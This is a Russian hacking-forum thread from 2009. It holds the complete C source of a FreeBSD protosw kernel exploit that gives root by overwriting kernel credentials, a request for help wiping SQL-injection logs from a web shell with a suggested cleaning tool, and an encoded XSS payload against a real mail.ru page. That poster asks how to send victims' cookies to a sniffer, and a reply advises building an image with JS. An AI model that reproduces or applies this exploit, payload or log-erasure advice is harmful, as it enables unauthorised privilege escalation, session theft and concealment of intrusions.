
19.09.2009, 11:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
http://forum.antichat.ru/thread52195.html
|
|
|

19.09.2009, 11:27
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Может не в ту тему я попал, извиняйте меня 
Кто может скомпилировать ?
Код:
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
А то у меня не получается
Последний раз редактировалось SeNaP; 19.09.2009 в 11:30..
|
|
|

19.09.2009, 22:32
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
Больше интересует 2 вопрос, про то какие логи надо подтерать
попробуй тулзу vanish2 , оно автоматом почистит.
|
|
|

20.09.2009, 11:56
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от warlok
попробуй тулзу vanish2 , оно автоматом почистит.
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров
|
|
|

20.09.2009, 12:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 568
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Byrger
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров
http://forum.antichat.net/threadnav49775-1-10.html
тут посмари где лежат логи и по логике ищи
|
|
|

20.09.2009, 11:25
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами:
8915055
Репутация:
-26
|
|
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
|
|
|

20.09.2009, 12:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Cehennem
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
На ачате уже много раз обсуждалось. Создавай картинку с помощью js.
Последний раз редактировалось mailbrush; 20.09.2009 в 12:18..
|
|
|

20.09.2009, 15:19
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами:
8915055
Репутация:
-26
|
|
Сообщение от mailbrush
Сообщение от Cehennem
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
Ну никто не ответит? Я знаю что для вас не трудно. Если не помешает поставьте из любого сниффера код в javascript xss, а потом я пойму.
плизззззззззз
|
|
|

20.09.2009, 12:19
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами:
8915055
Репутация:
-26
|
|
mailbrush я не понял? Можешь вделить то место на коде javascripta, куда нужно поставить код сниффера или сам постав код сниффера, а я сам догадаюсь уже.
|
|
|

20.09.2009, 14:23
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Это краткое описание уязвимостей php.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|